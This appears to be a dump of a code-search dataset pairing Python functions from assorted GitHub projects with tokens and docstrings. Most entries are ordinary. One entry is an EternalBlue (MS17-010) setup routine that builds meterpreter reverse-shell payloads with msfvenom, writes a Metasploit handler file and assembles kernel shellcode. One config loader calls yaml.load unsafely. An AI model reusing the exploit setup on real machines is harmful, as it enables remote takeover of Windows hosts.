[ "def", "load_app", "(", "target", ")", ":", "global", "NORUN", "NORUN", ",", "nr_old", "=", "True", ",", "NORUN", "tmp", "=", "default_app", ".", "push", "(", ")", "# Create a new \"default application\"", "try", ":", "rv", "=", "load", "(", "target", ")", "# Import the target module", "return", "rv", "if", "callable", "(", "rv", ")", "else", "tmp", "finally", ":", "default_app", ".", "remove", "(", "tmp", ")", "# Remove the temporary added default application", "NORUN", "=", "nr_old" ]
Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter.
[ "Load", "a", "bottle", "application", "from", "a", "module", "and", "make", "sure", "that", "the", "import", "does", "not", "affect", "the", "current", "default", "application", "but", "returns", "a", "separate", "application", "object", ".", "See", ":", "func", ":", "load", "for", "the", "target", "parameter", "." ]
python
train
nilp0inter/trelloapi
trelloapi/make_endpoints.py
https://github.com/nilp0inter/trelloapi/blob/88f4135832548ea71598d50a73943890e1cf9e20/trelloapi/make_endpoints.py#L113-L140
def main(): """ Prints the complete YAML. """ ep = requests.get(TRELLO_API_DOC).content root = html.fromstring(ep) links = root.xpath('//a[contains(@class, "reference internal")]/@href') pages = [requests.get(TRELLO_API_DOC + u) for u in links if u.endswith('index.html')] endpoints = [] for page in pages: root = html.fromstring(page.content) sections = root.xpath('//div[@class="section"]/h2/..') for sec in sections: ep_html = etree.tostring(sec).decode('utf-8') ep_text = html2text(ep_html).splitlines() match = EP_DESC_REGEX.match(ep_text[0]) if not match: continue ep_method, ep_url = match.groups() ep_text[0] = ' '.join([ep_method, ep_url]) ep_doc = b64encode(gzip.compress('\n'.join(ep_text).encode('utf-8'))) endpoints.append((ep_method, ep_url, ep_doc)) print(yaml.dump(create_tree(endpoints)))
[ "def", "main", "(", ")", ":", "ep", "=", "requests", ".", "get", "(", "TRELLO_API_DOC", ")", ".", "content", "root", "=", "html", ".", "fromstring", "(", "ep", ")", "links", "=", "root", ".", "xpath", "(", "'//a[contains(@class, \"reference internal\")]/@href'", ")", "pages", "=", "[", "requests", ".", "get", "(", "TRELLO_API_DOC", "+", "u", ")", "for", "u", "in", "links", "if", "u", ".", "endswith", "(", "'index.html'", ")", "]", "endpoints", "=", "[", "]", "for", "page", "in", "pages", ":", "root", "=", "html", ".", "fromstring", "(", "page", ".", "content", ")", "sections", "=", "root", ".", "xpath", "(", "'//div[@class=\"section\"]/h2/..'", ")", "for", "sec", "in", "sections", ":", "ep_html", "=", "etree", ".", "tostring", "(", "sec", ")", ".", "decode", "(", "'utf-8'", ")", "ep_text", "=", "html2text", "(", "ep_html", ")", ".", "splitlines", "(", ")", "match", "=", "EP_DESC_REGEX", ".", "match", "(", "ep_text", "[", "0", "]", ")", "if", "not", "match", ":", "continue", "ep_method", ",", "ep_url", "=", "match", ".", "groups", "(", ")", "ep_text", "[", "0", "]", "=", "' '", ".", "join", "(", "[", "ep_method", ",", "ep_url", "]", ")", "ep_doc", "=", "b64encode", "(", "gzip", ".", "compress", "(", "'\\n'", ".", "join", "(", "ep_text", ")", ".", "encode", "(", "'utf-8'", ")", ")", ")", "endpoints", ".", "append", "(", "(", "ep_method", ",", "ep_url", ",", "ep_doc", ")", ")", "print", "(", "yaml", ".", "dump", "(", "create_tree", "(", "endpoints", ")", ")", ")" ]
Prints the complete YAML.
[ "Prints", "the", "complete", "YAML", "." ]
python
valid
pytorn/torn
torn/plugins/app.py
https://github.com/pytorn/torn/blob/68ba077173a1d22236d570d933dd99a3e3f0040f/torn/plugins/app.py#L11-L22
def settings(instance): """Definition to set settings from config file to the app instance.""" with open(instance.root_dir + '/Config/config.yml') as config: config = yaml.load(config) instance.name = config['name'] instance.port = config['web']['port'] # default host instance.host = "http://localhost" if 'host' in config['web']: instance.host = config['web']['host'] instance.debug = config['debug'] return instance
[ "def", "settings", "(", "instance", ")", ":", "with", "open", "(", "instance", ".", "root_dir", "+", "'/Config/config.yml'", ")", "as", "config", ":", "config", "=", "yaml", ".", "load", "(", "config", ")", "instance", ".", "name", "=", "config", "[", "'name'", "]", "instance", ".", "port", "=", "config", "[", "'web'", "]", "[", "'port'", "]", "# default host", "instance", ".", "host", "=", "\"http://localhost\"", "if", "'host'", "in", "config", "[", "'web'", "]", ":", "instance", ".", "host", "=", "config", "[", "'web'", "]", "[", "'host'", "]", "instance", ".", "debug", "=", "config", "[", "'debug'", "]", "return", "instance" ]
Definition to set settings from config file to the app instance.
[ "Definition", "to", "set", "settings", "from", "config", "file", "to", "the", "app", "instance", "." ]
python
train
sethmlarson/virtualbox-python
virtualbox/library.py
https://github.com/sethmlarson/virtualbox-python/blob/706c8e3f6e3aee17eb06458e73cbb4bc2d37878b/virtualbox/library.py#L13471-L13532
def mount_medium(self, name, controller_port, device, medium, force): """Mounts a medium (:py:class:`IMedium` , identified by the given UUID @a id) to the given storage controller (:py:class:`IStorageController` , identified by @a name), at the indicated port and device. The device must already exist; see :py:func:`IMachine.attach_device` for how to attach a new device. This method is intended only for managing removable media, where the device is fixed but media is changeable at runtime (such as DVDs and floppies). It cannot be used for fixed media such as hard disks. The @a controllerPort and @a device parameters specify the device slot and have have the same meaning as with :py:func:`IMachine.attach_device` . The specified device slot can have a medium mounted, which will be unmounted first. Specifying a zero UUID (or an empty string) for @a medium does just an unmount. See :py:class:`IMedium` for more detailed information about attaching media. in name of type str Name of the storage controller to attach the medium to. in controller_port of type int Port to attach the medium to. in device of type int Device slot in the given port to attach the medium to. in medium of type :class:`IMedium` Medium to mount or @c null for an empty drive. in force of type bool Allows to force unmount/mount of a medium which is locked by the device slot in the given port to attach the medium to. raises :class:`OleErrorInvalidarg` SATA device, SATA port, IDE port or IDE slot out of range. raises :class:`VBoxErrorInvalidObjectState` Attempt to attach medium to an unregistered virtual machine. raises :class:`VBoxErrorInvalidVmState` Invalid machine state. raises :class:`VBoxErrorObjectInUse` Medium already attached to this or another virtual machine. """ if not isinstance(name, basestring): raise TypeError("name can only be an instance of type basestring") if not isinstance(controller_port, baseinteger): raise TypeError("controller_port can only be an instance of type baseinteger") if not isinstance(device, baseinteger): raise TypeError("device can only be an instance of type baseinteger") if not isinstance(medium, IMedium): raise TypeError("medium can only be an instance of type IMedium") if not isinstance(force, bool): raise TypeError("force can only be an instance of type bool") self._call("mountMedium", in_p=[name, controller_port, device, medium, force])
[ "def", "mount_medium", "(", "self", ",", "name", ",", "controller_port", ",", "device", ",", "medium", ",", "force", ")", ":", "if", "not", "isinstance", "(", "name", ",", "basestring", ")", ":", "raise", "TypeError", "(", "\"name can only be an instance of type basestring\"", ")", "if", "not", "isinstance", "(", "controller_port", ",", "baseinteger", ")", ":", "raise", "TypeError", "(", "\"controller_port can only be an instance of type baseinteger\"", ")", "if", "not", "isinstance", "(", "device", ",", "baseinteger", ")", ":", "raise", "TypeError", "(", "\"device can only be an instance of type baseinteger\"", ")", "if", "not", "isinstance", "(", "medium", ",", "IMedium", ")", ":", "raise", "TypeError", "(", "\"medium can only be an instance of type IMedium\"", ")", "if", "not", "isinstance", "(", "force", ",", "bool", ")", ":", "raise", "TypeError", "(", "\"force can only be an instance of type bool\"", ")", "self", ".", "_call", "(", "\"mountMedium\"", ",", "in_p", "=", "[", "name", ",", "controller_port", ",", "device", ",", "medium", ",", "force", "]", ")" ]
Mounts a medium (:py:class:`IMedium` , identified by the given UUID @a id) to the given storage controller (:py:class:`IStorageController` , identified by @a name), at the indicated port and device. The device must already exist; see :py:func:`IMachine.attach_device` for how to attach a new device. This method is intended only for managing removable media, where the device is fixed but media is changeable at runtime (such as DVDs and floppies). It cannot be used for fixed media such as hard disks. The @a controllerPort and @a device parameters specify the device slot and have have the same meaning as with :py:func:`IMachine.attach_device` . The specified device slot can have a medium mounted, which will be unmounted first. Specifying a zero UUID (or an empty string) for @a medium does just an unmount. See :py:class:`IMedium` for more detailed information about attaching media. in name of type str Name of the storage controller to attach the medium to. in controller_port of type int Port to attach the medium to. in device of type int Device slot in the given port to attach the medium to. in medium of type :class:`IMedium` Medium to mount or @c null for an empty drive. in force of type bool Allows to force unmount/mount of a medium which is locked by the device slot in the given port to attach the medium to. raises :class:`OleErrorInvalidarg` SATA device, SATA port, IDE port or IDE slot out of range. raises :class:`VBoxErrorInvalidObjectState` Attempt to attach medium to an unregistered virtual machine. raises :class:`VBoxErrorInvalidVmState` Invalid machine state. raises :class:`VBoxErrorObjectInUse` Medium already attached to this or another virtual machine.
[ "Mounts", "a", "medium", "(", ":", "py", ":", "class", ":", "IMedium", "identified", "by", "the", "given", "UUID", "@a", "id", ")", "to", "the", "given", "storage", "controller", "(", ":", "py", ":", "class", ":", "IStorageController", "identified", "by", "@a", "name", ")", "at", "the", "indicated", "port", "and", "device", ".", "The", "device", "must", "already", "exist", ";", "see", ":", "py", ":", "func", ":", "IMachine", ".", "attach_device", "for", "how", "to", "attach", "a", "new", "device", ".", "This", "method", "is", "intended", "only", "for", "managing", "removable", "media", "where", "the", "device", "is", "fixed", "but", "media", "is", "changeable", "at", "runtime", "(", "such", "as", "DVDs", "and", "floppies", ")", ".", "It", "cannot", "be", "used", "for", "fixed", "media", "such", "as", "hard", "disks", ".", "The", "@a", "controllerPort", "and", "@a", "device", "parameters", "specify", "the", "device", "slot", "and", "have", "have", "the", "same", "meaning", "as", "with", ":", "py", ":", "func", ":", "IMachine", ".", "attach_device", ".", "The", "specified", "device", "slot", "can", "have", "a", "medium", "mounted", "which", "will", "be", "unmounted", "first", ".", "Specifying", "a", "zero", "UUID", "(", "or", "an", "empty", "string", ")", "for", "@a", "medium", "does", "just", "an", "unmount", ".", "See", ":", "py", ":", "class", ":", "IMedium", "for", "more", "detailed", "information", "about", "attaching", "media", "." ]
python
train
osfclient/osfclient
osfclient/cli.py
https://github.com/osfclient/osfclient/blob/44b9a87e8c1ae6b63cdecd27a924af3fc2bf94cf/osfclient/cli.py#L82-L103
def might_need_auth(f): """Decorate a CLI function that might require authentication. Catches any UnauthorizedException raised, prints a helpful message and then exits. """ @wraps(f) def wrapper(cli_args): try: return_value = f(cli_args) except UnauthorizedException as e: config = config_from_env(config_from_file()) username = _get_username(cli_args, config) if username is None: sys.exit("Please set a username (run `osf -h` for details).") else: sys.exit("You are not authorized to access this project.") return return_value return wrapper
[ "def", "might_need_auth", "(", "f", ")", ":", "@", "wraps", "(", "f", ")", "def", "wrapper", "(", "cli_args", ")", ":", "try", ":", "return_value", "=", "f", "(", "cli_args", ")", "except", "UnauthorizedException", "as", "e", ":", "config", "=", "config_from_env", "(", "config_from_file", "(", ")", ")", "username", "=", "_get_username", "(", "cli_args", ",", "config", ")", "if", "username", "is", "None", ":", "sys", ".", "exit", "(", "\"Please set a username (run `osf -h` for details).\"", ")", "else", ":", "sys", ".", "exit", "(", "\"You are not authorized to access this project.\"", ")", "return", "return_value", "return", "wrapper" ]
Decorate a CLI function that might require authentication. Catches any UnauthorizedException raised, prints a helpful message and then exits.
[ "Decorate", "a", "CLI", "function", "that", "might", "require", "authentication", "." ]
python
valid
Pipoline/rocket-python
rocketchat/api.py
https://github.com/Pipoline/rocket-python/blob/643ece8a9db106922e019984a859ca04283262ff/rocketchat/api.py#L160-L167
def delete_public_room(self, room_id, **kwargs): """ Delete room with given ID :param room_id: Room ID :param kwargs: :return: """ return DeletePublicRoom(settings=self.settings, **kwargs).call(room_id=room_id, **kwargs)
[ "def", "delete_public_room", "(", "self", ",", "room_id", ",", "*", "*", "kwargs", ")", ":", "return", "DeletePublicRoom", "(", "settings", "=", "self", ".", "settings", ",", "*", "*", "kwargs", ")", ".", "call", "(", "room_id", "=", "room_id", ",", "*", "*", "kwargs", ")" ]
Delete room with given ID :param room_id: Room ID :param kwargs: :return:
[ "Delete", "room", "with", "given", "ID", ":", "param", "room_id", ":", "Room", "ID", ":", "param", "kwargs", ":", ":", "return", ":" ]
python
train
hvac/hvac
hvac/api/secrets_engines/identity.py
https://github.com/hvac/hvac/blob/cce5b86889193f622c2a72a4a1b7e1c9c8aff1ce/hvac/api/secrets_engines/identity.py#L674-L693
def delete_group(self, group_id, mount_point=DEFAULT_MOUNT_POINT): """Delete a group. Supported methods: DELETE: /{mount_point}/group/id/{id}. Produces: 204 (empty body) :param group_id: Identifier of the entity. :type group_id: str | unicode :param mount_point: The "path" the method/backend was mounted on. :type mount_point: str | unicode :return: The response of the request. :rtype: requests.Response """ api_path = '/v1/{mount_point}/group/id/{id}'.format( mount_point=mount_point, id=group_id, ) return self._adapter.delete( url=api_path, )
[ "def", "delete_group", "(", "self", ",", "group_id", ",", "mount_point", "=", "DEFAULT_MOUNT_POINT", ")", ":", "api_path", "=", "'/v1/{mount_point}/group/id/{id}'", ".", "format", "(", "mount_point", "=", "mount_point", ",", "id", "=", "group_id", ",", ")", "return", "self", ".", "_adapter", ".", "delete", "(", "url", "=", "api_path", ",", ")" ]
Delete a group. Supported methods: DELETE: /{mount_point}/group/id/{id}. Produces: 204 (empty body) :param group_id: Identifier of the entity. :type group_id: str | unicode :param mount_point: The "path" the method/backend was mounted on. :type mount_point: str | unicode :return: The response of the request. :rtype: requests.Response
[ "Delete", "a", "group", "." ]
python
train
fastavro/fastavro
fastavro/_write_py.py
https://github.com/fastavro/fastavro/blob/bafe826293e19eb93e77bbb0f6adfa059c7884b2/fastavro/_write_py.py#L148-L203
def prepare_fixed_decimal(data, schema): """Converts decimal.Decimal to fixed length bytes array""" if not isinstance(data, decimal.Decimal): return data scale = schema.get('scale', 0) size = schema['size'] # based on https://github.com/apache/avro/pull/82/ sign, digits, exp = data.as_tuple() if -exp > scale: raise ValueError( 'Scale provided in schema does not match the decimal') delta = exp + scale if delta > 0: digits = digits + (0,) * delta unscaled_datum = 0 for digit in digits: unscaled_datum = (unscaled_datum * 10) + digit bits_req = unscaled_datum.bit_length() + 1 size_in_bits = size * 8 offset_bits = size_in_bits - bits_req mask = 2 ** size_in_bits - 1 bit = 1 for i in range(bits_req): mask ^= bit bit <<= 1 if bits_req < 8: bytes_req = 1 else: bytes_req = bits_req // 8 if bits_req % 8 != 0: bytes_req += 1 tmp = MemoryIO() if sign: unscaled_datum = (1 << bits_req) - unscaled_datum unscaled_datum = mask | unscaled_datum for index in range(size - 1, -1, -1): bits_to_write = unscaled_datum >> (8 * index) tmp.write(mk_bits(bits_to_write & 0xff)) else: for i in range(offset_bits // 8): tmp.write(mk_bits(0)) for index in range(bytes_req - 1, -1, -1): bits_to_write = unscaled_datum >> (8 * index) tmp.write(mk_bits(bits_to_write & 0xff)) return tmp.getvalue()
[ "def", "prepare_fixed_decimal", "(", "data", ",", "schema", ")", ":", "if", "not", "isinstance", "(", "data", ",", "decimal", ".", "Decimal", ")", ":", "return", "data", "scale", "=", "schema", ".", "get", "(", "'scale'", ",", "0", ")", "size", "=", "schema", "[", "'size'", "]", "# based on https://github.com/apache/avro/pull/82/", "sign", ",", "digits", ",", "exp", "=", "data", ".", "as_tuple", "(", ")", "if", "-", "exp", ">", "scale", ":", "raise", "ValueError", "(", "'Scale provided in schema does not match the decimal'", ")", "delta", "=", "exp", "+", "scale", "if", "delta", ">", "0", ":", "digits", "=", "digits", "+", "(", "0", ",", ")", "*", "delta", "unscaled_datum", "=", "0", "for", "digit", "in", "digits", ":", "unscaled_datum", "=", "(", "unscaled_datum", "*", "10", ")", "+", "digit", "bits_req", "=", "unscaled_datum", ".", "bit_length", "(", ")", "+", "1", "size_in_bits", "=", "size", "*", "8", "offset_bits", "=", "size_in_bits", "-", "bits_req", "mask", "=", "2", "**", "size_in_bits", "-", "1", "bit", "=", "1", "for", "i", "in", "range", "(", "bits_req", ")", ":", "mask", "^=", "bit", "bit", "<<=", "1", "if", "bits_req", "<", "8", ":", "bytes_req", "=", "1", "else", ":", "bytes_req", "=", "bits_req", "//", "8", "if", "bits_req", "%", "8", "!=", "0", ":", "bytes_req", "+=", "1", "tmp", "=", "MemoryIO", "(", ")", "if", "sign", ":", "unscaled_datum", "=", "(", "1", "<<", "bits_req", ")", "-", "unscaled_datum", "unscaled_datum", "=", "mask", "|", "unscaled_datum", "for", "index", "in", "range", "(", "size", "-", "1", ",", "-", "1", ",", "-", "1", ")", ":", "bits_to_write", "=", "unscaled_datum", ">>", "(", "8", "*", "index", ")", "tmp", ".", "write", "(", "mk_bits", "(", "bits_to_write", "&", "0xff", ")", ")", "else", ":", "for", "i", "in", "range", "(", "offset_bits", "//", "8", ")", ":", "tmp", ".", "write", "(", "mk_bits", "(", "0", ")", ")", "for", "index", "in", "range", "(", "bytes_req", "-", "1", ",", "-", "1", ",", "-", "1", ")", ":", "bits_to_write", "=", "unscaled_datum", ">>", "(", "8", "*", "index", ")", "tmp", ".", "write", "(", "mk_bits", "(", "bits_to_write", "&", "0xff", ")", ")", "return", "tmp", ".", "getvalue", "(", ")" ]
Converts decimal.Decimal to fixed length bytes array
[ "Converts", "decimal", ".", "Decimal", "to", "fixed", "length", "bytes", "array" ]
python
train
vertical-knowledge/ripozo-sqlalchemy
ripozo_sqlalchemy/alchemymanager.py
https://github.com/vertical-knowledge/ripozo-sqlalchemy/blob/4bcc57ec6db1b39b84b50553bb264e4950ce4ec2/ripozo_sqlalchemy/alchemymanager.py#L217-L236
def update(self, session, lookup_keys, updates, *args, **kwargs): """ Updates the model with the specified lookup_keys and returns the dictified object. :param Session session: The SQLAlchemy session to use :param dict lookup_keys: A dictionary mapping the fields and their expected values :param dict updates: The columns and the values to update them to. :return: The dictionary of keys and values for the retrieved model. The only values returned will be those specified by fields attrbute on the class :rtype: dict :raises: NotFoundException """ model = self._get_model(lookup_keys, session) model = self._set_values_on_model(model, updates, fields=self.update_fields) session.commit() return self.serialize_model(model)
[ "def", "update", "(", "self", ",", "session", ",", "lookup_keys", ",", "updates", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "model", "=", "self", ".", "_get_model", "(", "lookup_keys", ",", "session", ")", "model", "=", "self", ".", "_set_values_on_model", "(", "model", ",", "updates", ",", "fields", "=", "self", ".", "update_fields", ")", "session", ".", "commit", "(", ")", "return", "self", ".", "serialize_model", "(", "model", ")" ]
Updates the model with the specified lookup_keys and returns the dictified object. :param Session session: The SQLAlchemy session to use :param dict lookup_keys: A dictionary mapping the fields and their expected values :param dict updates: The columns and the values to update them to. :return: The dictionary of keys and values for the retrieved model. The only values returned will be those specified by fields attrbute on the class :rtype: dict :raises: NotFoundException
[ "Updates", "the", "model", "with", "the", "specified", "lookup_keys", "and", "returns", "the", "dictified", "object", "." ]
python
train
mwgielen/jackal
jackal/scripts/eternalblue.py
https://github.com/mwgielen/jackal/blob/7fe62732eb5194b7246215d5277fb37c398097bf/jackal/scripts/eternalblue.py#L30-L95
def setup(self): """ This function will call msfvenom, nasm and git via subprocess to setup all the things. Returns True if everything went well, otherwise returns False. """ lport64 = self.port64 lport32 = self.port32 print_notification("Using ip: {}".format(self.ip)) print_notification("Generating metasploit resource file") resource = """use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST {ip} set LPORT {port64} set ExitOnSession false run -j set payload windows/meterpreter/reverse_tcp set LHOST {ip} set LPORT {port32} set ExitOnSession false run -j """.format(ip=self.ip, port64=lport64, port32=lport32) self.resource_file = os.path.join(self.datadir, 'ms17_resource.rc') with open(self.resource_file, 'w') as f: f.write(resource) print_success("Resource file created, run the following command in msfconsole:") print_success("resource {}".format(self.resource_file)) command_64 = "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin".format(ip=self.ip, port=lport32, datadir=self.datadir) command_32 = "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin".format(ip=self.ip, port=lport64, datadir=self.datadir) print_notification("Generating payloads") process = subprocess.run(command_32.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE) if process.returncode != 0: print_error("Problem with generating payload:") print_error(process.stderr) return False process = subprocess.run(command_64.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE) if process.returncode != 0: print_error("Problem with generating payload:") print_error(process.stderr) return False if not os.path.exists(os.path.join(self.datadir, 'MS17-010')): print_notification("Git repo was not found, cloning") process = subprocess.run("git clone https://github.com/mwgielen/MS17-010 {dir}".format(dir=os.path.join(self.datadir, 'MS17-010')).split(' ')) if process.returncode != 0: print_error("Problems with cloning git") return False process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o {datadir}/kshell64.bin".format(datadir=self.datadir).split(' ')) if process.returncode != 0: print_error("Problems with NASM") return False process = subprocess.run("nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o {datadir}/kshell86.bin".format(datadir=self.datadir).split(' ')) if process.returncode != 0: print_error("Problems with NASM") return False self.combine_files('kshell64.bin', 'payload64.bin', 'final_met_64.bin') self.combine_files('kshell86.bin', 'payload32.bin', 'final_met_32.bin') self.create_payload('final_met_32.bin', 'final_met_64.bin', 'final_combined.bin') print_notification("Combining payloads done") print_success("Setup Done") return True
[ "def", "setup", "(", "self", ")", ":", "lport64", "=", "self", ".", "port64", "lport32", "=", "self", ".", "port32", "print_notification", "(", "\"Using ip: {}\"", ".", "format", "(", "self", ".", "ip", ")", ")", "print_notification", "(", "\"Generating metasploit resource file\"", ")", "resource", "=", "\"\"\"use exploit/multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset LHOST {ip}\nset LPORT {port64}\nset ExitOnSession false\nrun -j\nset payload windows/meterpreter/reverse_tcp\nset LHOST {ip}\nset LPORT {port32}\nset ExitOnSession false\nrun -j\n\"\"\"", ".", "format", "(", "ip", "=", "self", ".", "ip", ",", "port64", "=", "lport64", ",", "port32", "=", "lport32", ")", "self", ".", "resource_file", "=", "os", ".", "path", ".", "join", "(", "self", ".", "datadir", ",", "'ms17_resource.rc'", ")", "with", "open", "(", "self", ".", "resource_file", ",", "'w'", ")", "as", "f", ":", "f", ".", "write", "(", "resource", ")", "print_success", "(", "\"Resource file created, run the following command in msfconsole:\"", ")", "print_success", "(", "\"resource {}\"", ".", "format", "(", "self", ".", "resource_file", ")", ")", "command_64", "=", "\"msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin\"", ".", "format", "(", "ip", "=", "self", ".", "ip", ",", "port", "=", "lport32", ",", "datadir", "=", "self", ".", "datadir", ")", "command_32", "=", "\"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin\"", ".", "format", "(", "ip", "=", "self", ".", "ip", ",", "port", "=", "lport64", ",", "datadir", "=", "self", ".", "datadir", ")", "print_notification", "(", "\"Generating payloads\"", ")", "process", "=", "subprocess", ".", "run", "(", "command_32", ".", "split", "(", "' '", ")", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problem with generating payload:\"", ")", "print_error", "(", "process", ".", "stderr", ")", "return", "False", "process", "=", "subprocess", ".", "run", "(", "command_64", ".", "split", "(", "' '", ")", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problem with generating payload:\"", ")", "print_error", "(", "process", ".", "stderr", ")", "return", "False", "if", "not", "os", ".", "path", ".", "exists", "(", "os", ".", "path", ".", "join", "(", "self", ".", "datadir", ",", "'MS17-010'", ")", ")", ":", "print_notification", "(", "\"Git repo was not found, cloning\"", ")", "process", "=", "subprocess", ".", "run", "(", "\"git clone https://github.com/mwgielen/MS17-010 {dir}\"", ".", "format", "(", "dir", "=", "os", ".", "path", ".", "join", "(", "self", ".", "datadir", ",", "'MS17-010'", ")", ")", ".", "split", "(", "' '", ")", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problems with cloning git\"", ")", "return", "False", "process", "=", "subprocess", ".", "run", "(", "\"nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o {datadir}/kshell64.bin\"", ".", "format", "(", "datadir", "=", "self", ".", "datadir", ")", ".", "split", "(", "' '", ")", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problems with NASM\"", ")", "return", "False", "process", "=", "subprocess", ".", "run", "(", "\"nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o {datadir}/kshell86.bin\"", ".", "format", "(", "datadir", "=", "self", ".", "datadir", ")", ".", "split", "(", "' '", ")", ")", "if", "process", ".", "returncode", "!=", "0", ":", "print_error", "(", "\"Problems with NASM\"", ")", "return", "False", "self", ".", "combine_files", "(", "'kshell64.bin'", ",", "'payload64.bin'", ",", "'final_met_64.bin'", ")", "self", ".", "combine_files", "(", "'kshell86.bin'", ",", "'payload32.bin'", ",", "'final_met_32.bin'", ")", "self", ".", "create_payload", "(", "'final_met_32.bin'", ",", "'final_met_64.bin'", ",", "'final_combined.bin'", ")", "print_notification", "(", "\"Combining payloads done\"", ")", "print_success", "(", "\"Setup Done\"", ")", "return", "True" ]
This function will call msfvenom, nasm and git via subprocess to setup all the things. Returns True if everything went well, otherwise returns False.
[ "This", "function", "will", "call", "msfvenom", "nasm", "and", "git", "via", "subprocess", "to", "setup", "all", "the", "things", ".", "Returns", "True", "if", "everything", "went", "well", "otherwise", "returns", "False", "." ]
python
valid
MartinThoma/hwrt
hwrt/preprocess_dataset.py
https://github.com/MartinThoma/hwrt/blob/725c21a3d0f5a30b8492cbc184b3688ceb364e1c/hwrt/preprocess_dataset.py#L56-L92
def create_preprocessed_dataset(path_to_data, outputpath, preprocessing_queue): """Create a preprocessed dataset file by applying `preprocessing_queue` to `path_to_data`. The result will be stored in `outputpath`.""" # Log everything logging.info("Data soure %s", path_to_data) logging.info("Output will be stored in %s", outputpath) tmp = "Preprocessing Queue:\n" for preprocessing_class in preprocessing_queue: tmp += str(preprocessing_class) + "\n" logging.info(tmp) # Load from pickled file if not os.path.isfile(path_to_data): logging.info(("'%s' does not exist. Please either abort this script " "or update the data location."), path_to_data) raw_dataset_path = utils.choose_raw_dataset() # Get project-relative path raw_dataset_path = "raw-datasets" + \ raw_dataset_path.split("raw-datasets")[1] print(raw_dataset_path) sys.exit() # TODO: Update model! logging.info("Start loading data...") loaded = pickle.load(open(path_to_data, "rb")) raw_datasets = loaded['handwriting_datasets'] logging.info("Start applying preprocessing methods") start_time = time.time() for i, raw_dataset in enumerate(raw_datasets): if i % 10 == 0 and i > 0: utils.print_status(len(raw_datasets), i, start_time) # Do the work raw_dataset['handwriting'].preprocessing(preprocessing_queue) sys.stdout.write("\r%0.2f%% (done)\033[K\n" % (100)) print("") pickle.dump({'handwriting_datasets': raw_datasets, 'formula_id2latex': loaded['formula_id2latex'], 'preprocessing_queue': preprocessing_queue}, open(outputpath, "wb"), 2)
[ "def", "create_preprocessed_dataset", "(", "path_to_data", ",", "outputpath", ",", "preprocessing_queue", ")", ":", "# Log everything", "logging", ".", "info", "(", "\"Data soure %s\"", ",", "path_to_data", ")", "logging", ".", "info", "(", "\"Output will be stored in %s\"", ",", "outputpath", ")", "tmp", "=", "\"Preprocessing Queue:\\n\"", "for", "preprocessing_class", "in", "preprocessing_queue", ":", "tmp", "+=", "str", "(", "preprocessing_class", ")", "+", "\"\\n\"", "logging", ".", "info", "(", "tmp", ")", "# Load from pickled file", "if", "not", "os", ".", "path", ".", "isfile", "(", "path_to_data", ")", ":", "logging", ".", "info", "(", "(", "\"'%s' does not exist. Please either abort this script \"", "\"or update the data location.\"", ")", ",", "path_to_data", ")", "raw_dataset_path", "=", "utils", ".", "choose_raw_dataset", "(", ")", "# Get project-relative path", "raw_dataset_path", "=", "\"raw-datasets\"", "+", "raw_dataset_path", ".", "split", "(", "\"raw-datasets\"", ")", "[", "1", "]", "print", "(", "raw_dataset_path", ")", "sys", ".", "exit", "(", ")", "# TODO: Update model!", "logging", ".", "info", "(", "\"Start loading data...\"", ")", "loaded", "=", "pickle", ".", "load", "(", "open", "(", "path_to_data", ",", "\"rb\"", ")", ")", "raw_datasets", "=", "loaded", "[", "'handwriting_datasets'", "]", "logging", ".", "info", "(", "\"Start applying preprocessing methods\"", ")", "start_time", "=", "time", ".", "time", "(", ")", "for", "i", ",", "raw_dataset", "in", "enumerate", "(", "raw_datasets", ")", ":", "if", "i", "%", "10", "==", "0", "and", "i", ">", "0", ":", "utils", ".", "print_status", "(", "len", "(", "raw_datasets", ")", ",", "i", ",", "start_time", ")", "# Do the work", "raw_dataset", "[", "'handwriting'", "]", ".", "preprocessing", "(", "preprocessing_queue", ")", "sys", ".", "stdout", ".", "write", "(", "\"\\r%0.2f%% (done)\\033[K\\n\"", "%", "(", "100", ")", ")", "print", "(", "\"\"", ")", "pickle", ".", "dump", "(", "{", "'handwriting_datasets'", ":", "raw_datasets", ",", "'formula_id2latex'", ":", "loaded", "[", "'formula_id2latex'", "]", ",", "'preprocessing_queue'", ":", "preprocessing_queue", "}", ",", "open", "(", "outputpath", ",", "\"wb\"", ")", ",", "2", ")" ]
Create a preprocessed dataset file by applying `preprocessing_queue` to `path_to_data`. The result will be stored in `outputpath`.
[ "Create", "a", "preprocessed", "dataset", "file", "by", "applying", "preprocessing_queue", "to", "path_to_data", ".", "The", "result", "will", "be", "stored", "in", "outputpath", "." ]
python
train
ladybug-tools/ladybug
ladybug/_datacollectionbase.py
https://github.com/ladybug-tools/ladybug/blob/c08b7308077a48d5612f644943f92d5b5dade583/ladybug/_datacollectionbase.py#L573-L581
